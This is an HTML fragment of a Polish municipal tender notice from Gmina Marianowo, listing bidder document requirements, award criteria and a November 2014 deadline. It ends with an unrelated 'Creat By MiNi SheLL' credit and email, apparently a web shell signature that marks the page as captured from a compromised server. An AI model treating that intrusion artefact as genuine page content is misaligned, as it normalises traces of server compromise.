<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Europejski standart spalin - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień Umowy jest dopuszczalna w przypadku:
a) zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami lub obowiązującymi przepisami prawa,
b) zmiany obowiązującej wysokości podatku od towarów i usług w przypadku, gdy zmiana ta spowoduje zwiększenie lub zmniejszenie kosztów wykonania Umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia wynagrodzenia należnego Wykonawcy o kwotę stanowiącą różnicę między nowo obowiązującą a dotychczasową wysokością podatku od towarów i usług, jednakże wyłącznie za okres po wejściu w życie zmiany jego wysokości.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.marianowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Marianowo ul. Mieszka I 1, 73-121 Marianowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2014 godzina 10:30, miejsce: Urząd Gminy Marianowo ul. Mieszka I 1, 73-121 Marianowo, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com